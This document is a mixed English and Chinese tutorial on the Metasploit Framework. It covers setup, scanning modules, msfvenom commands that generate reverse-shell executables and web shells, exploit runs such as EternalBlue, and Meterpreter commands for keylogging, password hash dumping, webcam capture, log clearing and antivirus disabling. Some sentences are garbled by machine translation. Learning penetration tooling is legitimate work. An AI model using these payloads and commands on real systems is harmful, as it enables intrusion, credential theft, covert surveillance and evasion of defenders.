Article directory
- Explanation of common terms
- Introduction to MSF
- MSF framework structure
- MSF configuration database
- MSF command query
- MSF module introduction
- MSF auxiliary scanning module - auxiliary
- MSF attack load module - payloads
- MSF exploit module - exploits
- Meterpreter extension module
Explanation of common terms
POC: Proof of Concept, a proof of concept, a piece of code used to prove the existence of a vulnerability, not offensive
EXP: Exploit, use, the action, method, and method of using system vulnerabilities to attack, which is aggressive
Payload: Payload refers to the code or instruction that is actually executed in the system after the Exploit is successfully executed
Shellcode: A piece of code executed for exploiting vulnerabilities, which is a hexadecimal machine code,
named because it establishes a forward/reverse shell
Client: client
Team Server: server, C2 server, Beacon Payload controller
Beacon: It is the payload that Cobalt Strike runs on the target host. Beacon provides services on the covert channel for long-term control of the infected host.
C2: Short for Command & Control Server, which is the command and control server
Introduction to MSF
Abbreviation for The Metasploit Framework. MSF is highly modular, that is, the framework is composed of multiple modules
, and is one of the most popular penetration testing tools in the world
It is an open source security vulnerability exploitation and testing tool, which integrates common overflow vulnerabilities and popular
shellcodes on various platforms, and keeps updating continuously.
Metasploit covers the whole process of penetration testing, and you can use the existing Payload to conduct a series of penetration testing under this framework
.
MSF framework structure
Kali-metasploit framework directory path
/usr/share/metasploit-framework
data: An editable file containing binaries needed by metasploit to store certain exploits, wordlists, images, etc.- documentation: Contains available documentation for the framework.
- lib: The library folder for metasploit.
- plugins: plugins used to store metasploit.
- scripts: scripts used to store metasploit, including meterpreter and other scripts.
- tools: stores various command-line utilities.
- modules: store the module files of metasploit.
kali Metasploit Update
msfconsole -v # 查看版本
apt-get update
apt-get install metasploit-framework
MSF configuration database
Metasploit supports the use of databases to save various data obtained during penetration testing
Open postgresql database
service postgresql start
Initialize the MSF database
msfdb init
Create a database user: msf
Create a database: msf
Create a database: msf_test
Create a configuration file: /usr/share/metasploit-framework/config/database.yml
Create a data table required to save MSF framework information
start msfconsole
msfconsole
Msfconsole is the Metasploit framework user interface, we can use all modules in Metasploit through the Msfconsole interface
Msfconsole is mainly used for:
- Manage the Metasploit database
- manage session
- Configure to start the Metasploit module
When starting msfconsole, MSF will automatically log in to the msf database using the created msf user
View database connection status
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
Connect to other databases
msf6 > db_connect 用户名:口令@服务器地址:端口/数据库名称
MSF command query
Common commands
show exploits – 查看所有可用的渗透攻击程序代码
show auxiliary – 查看所有可用的辅助攻击工具
[show ]options/advanced – 查看该模块可用选项
show payloads – 查看该模块适用的所有载荷代码
show targets – 查看该模块适用的攻击目标类型
search – 根据关键字搜索某模块
info – 显示某模块的详细信息
use – 使用某渗透攻击模块
back – 回退
set/unset – 设置/禁用模块中的某个参数
setg/unsetg – 设置/禁用适用于所有模块的全局参数
MSF module introduction
The module is the most core penetration testing function implementation code provided externally through the Metasploit framework loading integration.
All MSF vulnerability tests are based on modules.
auxiliary (auxiliary module)
Assisted penetration (port scanning, login password blasting, vulnerability verification, etc.)
A module for auxiliary operations. The auxiliary module can obtain rich intelligence information of the target system before infiltration, so as to launch
more targeted and precise attacks.
For example, scanning and enumeration for various network services, network scanning, enumeration, vulnerability scanning, login password brute force cracking,
fuzz testing, crawler traversal, data extraction, etc.
In addition, the auxiliary module also includes some penetration attacks that do not need to load the attack load and often do not obtain the remote control
right of the target system, such as denial of service attacks.
exploits (exploitation module)
Contains mainstream exploit scripts, usually exploiting some potentially vulnerable targets.
Naming rules: classification of operating systems/various application protocols
Modules for exploiting vulnerabilities and delivering payloads. A code component that exploits discovered security holes or configuration weaknesses
to attack remote target systems to implant and run attack loads to obtain access control rights to the target system.
There are remote exploits, local exploits, privilege escalation exploits, client-side exploits, web application
exploits, and many others.
payloads (attack load)
It is mainly the code executed on the target machine after the attack is successful, such as the code of the reverse shell
Modules for performing operations during exploitation. The attack payload is a piece of implanted code that runs on the target system after a successful penetration attack
, usually to open a control session connection on the target system for the penetration attacker. In traditional penetration
code development, the attack load is just a piece of ShellCode code with simple functions, which is compiled in assembly language and converted
into machine code supported by the CPU architecture of the target system. After the penetration attack triggers the vulnerability, the program execution
process hijacked and Jump into this machine code for execution, so as to complete the single function implemented in ShellCode.
For example, establish a Meterpreter session, reverse shell, execute commands, download and execute programs, etc.
post (post-infiltration stage module)
After exploiting the vulnerability and successfully obtaining the meterpreter, send some functional instructions to the target, such as: privilege escalation, etc.
Modules for post-exploitation operations after gaining privileges such as credential/hash dumping, local privilege escalation
, backdoor installation, sensitive data extraction, network traffic tunneling (proxy), keylogging, screen capture and many
others operate.
encoders (encoder module)
It mainly includes various encoding tools to encode and encrypt the payload so as to bypass the intrusion detection and filtering system
Modules for payload encoding and encryption such as base64, XOR, shikata_ga_nai, etc. This helps obfuscate to evade defenses
such as antivirus or NIDS (Network Intrusion Detection System), EDR (Endpoint Detection and Response) .
evasion (evasion module)
Used to generate anti-kill payload
Modules for evasion of defenses such as Antivirus evasion, AppLocker bypass, Software Restriction Policies (SRP) bypass
, etc.
nops (empty instruction module)
Empty instructions are empty operations, improving paylaod stability and maintaining size
Modules for generating harmless, benign "no-op" instructions, such as for padding purposes, sliding in memory during exploitation, etc. A component used to add an empty command area in the attack payload to improve the reliability of the attack.
These are some no-operation or irrelevant operation instructions that do not have any substantial impact on the running state of the program.
When a penetration attack constructs a malicious data buffer, it is often necessary to have a larger safe landing area when the Shellcode is actually executed, so as to avoid the Shellcode execution failure
caused by memory address randomization, return address calculation deviation, etc. , thereby improving
Reliability of Penetration Attacks.
MSF auxiliary scanning module - auxiliary
MSF host discovery
module path
modules/auxiliary/scanner/discovery/
search module
search aux /scanner/discovery
arp_sweep: use arp request to enumerate all active hosts in the local area network
udp_sweep: detect whether the specified host is active by sending UDP packets, and discover the udp service on the host
.
module use
How to use the arp_sweep module
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS xx.xx.xx.xx/24
set THREADS 50
run
After setting the parameters, enter run to start the scanner
MSF service scan
service scan
After determining the open port, mine the service information running on the corresponding port
module search
在 Metasploit 的 Scanner 辅助模块中,用于服务扫描和查点的工具常以
[service_name]_version 和 [service_name]_login 命名
[service_name]_version :可用于遍历网络中包含了某种服务的主机,并进
一步确定服务的版本
[service_name]_login :可对某种服务进行口令探测攻击
In MSF terminal you can type:
search _version
View all available service probe modules
In MSF terminal you can type:
search _login
Can view all service login password detection modules
Telnet service scan
module search
search scanner/telnet
telnet登录
auxiliary/scanner/telnet/telnet_login
扫描telnet版本
auxiliary/scanner/telnet/telnet_version
module use
use auxiliary/scanner/telnet/telnet_version
set RHOSTS xxx.xxx.xxx/24
set THREADS 100
run
SSH service scan
search scanner/ssh
ssh登录
auxiliary/scanner/ssh/ssh_login
ssh公共密钥认证登录
auxiliary/scanner/ssh/ssh_login_pubkey
扫描ssh版本测试
auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ssh/ssh_version
set RHOSTS xx.xx.xx.x/24
set THREADS 100
run
Oracle database scan
search scanner/oracle
use auxiliary/scanner/oracle/tnslsnr_version
set RHOSTS xx.xx.xx.xx/24
set THREADS 50
run
SMB service scan
search scanner/smb
SMB枚举
auxiliary/scanner/smb/smb_enumusers
返回DCERPC信息
auxiliary/scanner/smb/pipe_dcerpc_auditor
扫描SMB2协议
auxiliary/scanner/smb/smb2
扫描smb共享文件
auxiliary/scanner/smb/smb_enumshares
枚举系统上的用户
auxiliary/scanner/smb/smb_enumusers
SMB登录
auxiliary/scanner/smb/smb_login
扫描组的用户
auxiliary/scanner/smb/smb_lookupsid
扫描系统版本
auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_version
show options
set RHOSTS 192.168.1.111
run
db_hosts –c address,os_flavor
MSSQL service scan
search scanner/mssql
MSSQL登陆工具
scanner/mssql/mssql_login
测试MSSQL的存在和信息
scanner/mssql/mssql_ping
msf> use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
FTP scan
search scanner/ftp
ftp版本扫描
scanner/ftp/ftp_version
ftp匿名登录扫描
scanner/ftp/anonymous
use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
SMTP scanning
search scanner/snmp
smtp枚举
auxiliary/scanner/smtp/smtp_enum
扫描smtp版本
auxiliary/scanner/smtp/smtp_version
SNMP scan
search scanner/snmp
msf> use auxiliary/scanner/snmp/snmp_login
set RHOSTS 192.168.1.0/24
set THREADS 50
run
MSF port scan
module path
modules/auxiliary/scanner/portscan/
module search
search scanner/portscan
auxiliary/scanner/protscan/ack
//通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测
auxiliary/scanner/protscan/ftpbounce
//通过FTP bounce攻击的原理对TCP服务进行枚举,一些新的FTP服务器软件能很好
的防范此攻击,但在旧的系统上仍可以被利用
auxiliary/scanner/protscan/syn
//使用发送TCP SYN标志的方式探测开放端口
auxiliary/scanner/protscan/tcp
//通过一次完整的TCP连接来判断端口是否开放 最准确但是最慢
auxiliary/scanner/protscan/xmas
//一种更为隐秘的扫描方式,通过发送FIN,PSH,URG标志,能够躲避一些高级的
TCP标记检测器的过滤
In general, it is recommended to use the syn port scanner, which is faster, more accurate, and less likely to be detected by the other party.
module use
use auxiliary/scanner/protscan/syn
set RHOSTS 10.10.10.10
set THREADS 20
run
WMAP
Web application auxiliary scanning, vulnerability finding and other modules are basically under modules/auxiliary/, and
Metasploit has a built-in WMAP WEB scanner
To first create a database to store scanned data, initialize wmap
scan with wmap
msf > wmap_sites -a http://xx.xx.xx.xx //添加要扫描的网站
msf > wmap_sites -l
msf > wmap_targets -t http://xx.xx.xx.xx //把添加的网站作为扫描目标
msf > wmap_run -t //查看那些模块将在扫描中使用
msf > wmap_run -e //开始扫描
msf > vulns //查看漏洞信息
MSF attack load module - payloads
module path
/usr/share/metasploit-framework/modules/payloads
Payload, also known as attack payload, is mainly used to establish a stable connection between the target machine and the attacking machine. It can return to
the shell or perform program injection.
Payload type
singles
Independent load, which can be directly implanted into the target system and execute the corresponding program, such as: shell_bind_tcp this
payload.
adduser instance (singles)
Add an administrator user, the payload executed by cmd
search adduser
use 4
options
set user admin
set pass Admin@123
generate
generate -f
generate exe program
search adduser
use 3
generate -f exe -o xxx.exe
stages
The transmitter payload is used to establish a stable network connection between the target aircraft and the attack aircraft, and coordinates the attack with the transmitter payload
. Usually this type of payload is very small in size and can be easily injected after exploiting the vulnerability. The functions of this type of payload are very
similar and can be roughly divided into bind type and reverse type. The bind type requires the attack aircraft to actively connect to the target port
; while the reverse type is In order for the target to reversely connect to the attacking machine, the IP address and
port number to connect to the attacking machine need to be set in advance .
stages
Transport payload, such as shell, meterpreter, etc. After the stagers have established a stable connection, the attacking
machine transmits the stages to the target machine, and the stagers process accordingly, and transfer the control right to the stages.
For example, get the shell of the target machine, or run the meterpreter control program. In this way, the attack aircraft can
input corresponding commands at the local end to control the target aircraft.
Meterpreter is actually a payload. It needs stagers and corresponding stages to run together
. Meterpreter runs in memory and is implemented by injecting dll files.
It will not , so it is difficult to hack when it is invaded. turn up.
Stageless payload & Staged payload
The payload is divided into staged (staged) and stageless (not staged):
Stageless payload: <platform>/[arch]/<single>
Stageless Meterpreter is a binary file that contains all the necessary parts of Meterpreter and
all necessary extensions. It compiles the complete payload into a Trojan horse. It is huge and
can be directly implanted into the target system for execution
Staged payload: <platform>/[arch]/<stage>/<stager>
Staged Meterpreter is responsible for establishing the network connection between the target user and the attacker, and passing the execution to
another stage. MSF provides a staged implantation technology for the pairing of the transmitter and the transmitter. The penetration attack module
first implants the code, which is short and concise and reliable transporter load, and then further download and execute the transporter load when running the transporter load
, such as loading meterpreter, VNC desktop control and other complex large-scale attack loads.
stageless and staged are just like the big horses and little horses mentioned in web intrusion, one is fully functional, the other
just constructs a connection or command execution, and needs to be managed by other tools and scripts
![[Pasted image 20221226220707.png]]
Payload generation
Introduction to msfvenom
Msfvenom — Metasploit's independent payload generator, which is software used to generate backdoors, and
execute the backdoors online on the target machine.
msfvenom-options
Options:
-p:–payload,指定特定的 Payload,如果被设置为-,那么从标准输入流中读取。几乎支持全平台。 指定操作系统
-l:–list,列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, all
-n:–nopsled,指定 nop在 payload中的数量
-f:–format,指定 Payload的输出格式(–listformats:列出所有可用的输出格式) php exe
-e:–encoder,指定使用编码的encoder
X86/shikata_ga_nai最流行的编码,等级为excellent;
解码和编码过程都是随机生成的;cmd/powershell_base64也为excellent;
-a:–arch,指定目标系统架构 arm-安卓 x86 mips工业系统-路由器-交换机
–platform:指定目标系统平台 linus windows ios 安卓
-s:–space,设置未经编码的 Payload的最大长度(–encoder-space:编码后的 Payload的最大长度)
-b:–bad-chars,设置需要在 Payload中避免出现的字符,例如:’\0f’、’\x00’等
-i:–iterations,设置 Payload的编码次数
–smallest:尽可能生成最短的 Payload
-o:–out,保存 Payload到文件
-c:–add-code,指定一个附加的win32 shellcode文件
-x:–template,指定一个特定的可执行文件作为模板
-k:–keep,保护模板程序的功能,注入的payload作为一个新的进程运行
-v, --var-name,指定一个自定义的变量,以确定输出格式
-t, --timeout,从STDIN读取有效负载时要等待的秒数(默认为30,0 为禁用)
-h, --help,查看帮助选项
--help-formats,查看msf支持的输出格式列表
msfvenom generate payload
Generate payload, there are two required options: -p, -f, use -p to specify
the payload to be used, use -f to specify the output format of the payload
View a list of all MSF available payloads
msfvenom -l payloads
View the output formats supported by MSF
msfvenom -l formats
View available platforms
msfvenom -l platforms
Generate payload in exe format
msfvenom -p windows/meterpreter/bind_tcp -f exe -o 123.exe
msfvenom usage example
msfvenom generate windows executable program
msfvenom -p windows/x64/meterpreter/reverse_tcp
lhost=192.168.41.128 lport=5445 -f exe -o 5445.exe
-p windows/x64/meterpreter/reverse_tcp:指定payload类型为windows
x64系统下运行的反向TCP连接的meterpreter
lhost=192.168.41.128:指定payload反向连接的IP地址
lport=5445:指定payload反向连接的端口号
-f exe:生成exe格式的payload
-o m1.exe:保存payload为5445.exe文件名
msfconsole open monitor
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload
windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.41.128
msf6 exploit(multi/handler) > set lport 5445
msf6 exploit(multi/handler) > run
msfvenom generated payload ( web payload )
php:
msfvenom-p php/meterpreter/reverse_tcp LHOST=192.168.2.2
LPORT=4444 -f raw > shell.php
asp:
msfvenom -a x64 --platform windows -p
windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4444 -
f aspx -o shell.aspx
jsp:
Msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.2
LPORT=4444 -f raw > shell.jsp
war:
msfvenom-p java/jsp_shell_reverse_tcp LHOST=192.168.2.2
LPORT=4444 -f war > shell.war
Example:
generate payload:
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.40.132
lport=5555 -f raw -o shell_.php
Create a listener:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.40.132
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.40.132:5555
[*] Meterpreter session 3 opened (192.168.40.132:5555 ->
192.168.40.142:49419) at 10:54:02 -0400
meterpreter > sysinfo
Computer : SOURCE-PC
OS : Windows NT SOURCE-PC 6.1 build 7600 Meterpreter :
php/windows
msfvenom generate payload (script payload)
python:
msfvenom-p python/meterpreter/reverse_tcp LHOST=192.168.2.2
LPORT=4444 -f raw > shell.py
PowerShell:
msfvenom -p windows/x64/meterpreter_reverse_http
LHOST=192.168.2.2 LPORT=4444 -f psh > shell.ps1
bash:
msfvenom-p cmd/unix/reverse_bash LHOST=192.168.2.2 LPORT=4444
-f raw > shell.sh
perl:
msfvenom-p cmd/unix/reverse_perl LHOST=192.168.2.2 LPORT=4444
-f raw > shell.pl
Example:
msfvenom -p windows/x64/meterpreter_reverse_http
LHOST=192.168.2.2 LPORT=4444 -f psh > shell.ps1
powershell.exe -ExecutionPolicy Bypass -File shell.ps1
MSF exploit module - exploits
module path
/usr/share/metasploit-framework/modules/exploits
Windows - MS17-010
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.3.23
check //检测目标是否存在漏洞
run //运行攻击模块
Linux - Thinkphp-RCE
search thinkphp
![[Pasted image 20221226225141.png]]
use exploit/unix/webapp/thinkphp_rce
set rhosts xx.xx.xx.xx
set rport xxxx
set srvport xxxxxx
set lhost xx.xx.xx.xx
set lport xxxx
run
![[Pasted image 20221226231600.png]]
Meterpreter extension module
Introduction to meterpreter
Meterpreter is an advanced, dynamic, and extensible payload. Simply understood, it is an advanced
CMD that encapsulates the functions of Metasploit.
Meterpreter is an extension module in the Metasploit framework. It is used as the attack payload after the overflow attack is successful. The attack payload will return us a control channel after the overflow attack is successful. Using it as an attack payload can obtain a link to a Meterpreter shell on the target system.
Meterpreter shell has many useful functions as a penetration module, such as adding a user, hiding something, opening the shell, getting the user password, uploading and downloading files from the remote host, running cmd.exe, capturing the screen, getting remote control, and capturing key information , Clear the application program, display the system information of the remote host, display the network interface and IP address of the remote machine and other information.
meterpreter features
Metasploit provides Meterpreter versions of various mainstream platforms, including Windows and Linux, and supports x86 and x64 platforms at the same time. In addition, Meterpreter also provides implementations based on PHP and Java languages. The working mode of Meterpreter is pure memory. The advantage is that it starts hidden and is difficult to be detected by anti-virus software. There is no need to access the target host disk, so there are no traces of intrusion. In addition to the above, Meterpreter also supports extensions in the form of Ruby scripts.
enter meterpreter
background:将当前session挂起
sessions -l:列出当前所有的session
sessions -i id:进入某个session
Common commands
background #放回后台
exit #关闭会话
help #帮助信息
sysinfo #系统平台信息
screenshot #屏幕截取
shell #命令行shell (exit退出)
getlwd #查看本地目录
lcd #切换本地目录
getwd #查看目录
ls #查看文件目录列表
cd #切换目录
rm #删除文件
download C:\\1.txt 1.txt #下载文件
upload /var/www/wce.exe wce.exe #上传 文件
search -d c: -f *.doc #搜索文件
execute -f cmd.exe -i #执行程序/命令
ps #查看进程
getuid #查看当前用户权限
run killav #关闭杀毒软件
run getgui-e #启用远程桌面
Meterpreter commonly used shell
reverse_tcp
TCP-based rebound shell
linux/x86/meterpreter/reverse_tcp
windows/meterpreter/reverse_tcp
bind_tcp
TCP-based forward connection shell, because it cannot connect to the attacker's machine when the internal network crosses network segments, so it is
often used in the internal network, and there is no need to set LHOST
linux/x86/meterpreter/bind_tcp
reverse_http
The reverse connection based on http method is unstable when the network speed is slow
windows/meterpreter/reverse_http
reverse_https
The reverse connection based on https method is unstable when the network speed is slow.
windows/meterpreter/reverse_https
Detailed explanation of meterpreter commands
core command
? – 帮助菜单
background – 将当前会话移动到后台
bg - background的别名
bgkill – 总之后台 meterpreter 脚本
bglist – 列出后台运行中的脚本
bgrun – 作为一个后台线程运行脚本
channel – 显示活动频道
close – 关闭通道
disable_unicode_encoding - 禁用unicode字符串的编码
enable_unicode_encoding - 启用unicode字符串的编码
exit – 终止 meterpreter 会话
help – 帮助菜单
info - 显示有关Post模块的信息
irb - 在当前会话上打开交互式 Ruby 外壳
load - 加载一个或多个meterpreter扩展
machine_id - 获取连接到会话的计算机的 MSF ID
migrate - 将服务迁移到另一个进程
pivot - 管理pivot侦听器
pry - 打开当前会话上的pry调试器
quit - 终止 meterpreter 会话
read - 从通道中读取数据
resource - 运行存储在文件中的命令
run - 执行一个meterpreter 脚本 或者 Post模块
secure - 在会话中协商TLV分组加密
sessions - 快速切换到另外一个session
set_timeouts - 设置当前会话的超时值
sleep - 强制meterpreter停止活动,然后重新建立会话
transport - 改变目前的运输机制.
use - 加载 meterpreter 的扩展,'load'的旧别名
uuid - 获取当前会话的UUID
write – 将数据写入到一个通道
file system commands
cat - 读取并输出到标准输出文件的内容
cd - 更改目录对受害人
checksum - 检索文件的校验和
cp - 将源复制到目标
dir - 列出文件(别名为 ls)
download - 下载文件或目录
edit - 编辑文件
getlwd - 输出本地工作目录
getwd - 输出工作目录
lcd - 更改本地工作目录
lls - 列出本地文件
lpwd - 输出本地工作目录
ls - 列出当前目录中的文件列表
mkdir - 创建目录
mv - 将源移动到目标
rm - 删除指定的文件
rmdir - 删除目录
search - 在目标主机文件系统上查找搜索文件 例如:search -d c:\\
-f *.doc 在目标主机C盘下搜索doc文档
show_mount - 列出所有装载点/逻辑驱动器
upload - 上传文件或目录
network command
arp - 显示主机ARP缓存
getproxy - 显示当前代理配置
ifconfig - 显示网络接口的关键信息
ipconfig - 显示网络接口的关键信息
netstat - 显示网络连接
portfwd - 将本地端口转发到远程服务
例如:portfwd add -l 1122 -p 3389 -r
192.168.250.176把目标主机192.168.250.176的3389端口转发到1122端口
resolve - 解析目标上的一组主机名
route - 查看或加入受害者路由表 route add 5.5.5.0
255.255.255.0 1 用sessions 1会话加入指定网段
system command
clearev - 清除事件日志
drop_token - 放弃任何活动模拟令牌。
execute - 执行命令,在目标主机上运行某个程序 execute -f
notepad.exe ,执行目标主机上的记事本程序,隐藏后台执行,加参数-H
getenv - 获取一个或多个环境变量值
getpid - 获取当前进程 ID (PID)
getprivs - 尝试启用当前进程可用的所有权限
getsid - 获取当前运行服务用户的SID
getuid - 获取当前运行服务的用户
kill - 终止进程
localtime - 显示目标系统的本地日期和时间
pgrep - 按名称显示进程
pkill - 按名称终止进程
ps - 列出正在运行的进程
reboot - 重新启动受害人的计算机
reg - 与受害人的注册表进行交互
rev2self - 在受害者机器上调用 RevertToSelf()
shell - 在远程计算机上打开一个shell
shutdown - 关闭远程计算机
steal_token - 试图窃取指定的 (PID) 进程的令牌
suspend - 挂起或恢复进程列表
sysinfo - 获取关于远程系统的信息,如操作系统
UI commands
enumdesktops - 列出所有可访问的desktops和Windows
getdesktop - 获取当前的 meterpreter 桌面
idletime - 检查长时间以来,受害者系统空闲进程
keyboard_send - 发送一个键盘记录器
keyevent - 发送key事件
keyscan_dump - 转储键盘记录器缓冲区内容
keyscan_start - 启动键盘记录器
keyscan_stop - 停止键盘记录器
mouse - 发送鼠标事件
screenshare - 实时监视远程用户的桌面
screenshot - 抓取交互式桌面的屏幕截图
setdesktop - 更改 meterpreter 当前桌面
uictl - 启用用户界面组件的一些控件
camera command
record_mic - 从默认麦克风记录音频X秒
webcam_chat - 启动视频聊天
webcam_list - 列出摄像头
webcam_snap - 从指定的网络摄像头获取snapshot
webcam_stream - 从指定的网络摄像头播放视频流
Audio output command
play - 在目标系统上播放波形音频文件(.wav)
privilege escalation
getsystem - 获得系统管理员权限
password dump command
hashdump - 抓取哈希密码 (SAM) 文件中的值
hashdump 可以跳过杀毒软件,但现在有两个脚本,都更加隐蔽,”run hashdump”
和”run smart_hashdump”。
Timestomp
timestomp - 操作修改文件的MACE属性
Modified:修改时间
Accessed:访问时间
Created:创建时间
Entry Modified: 条目修改时间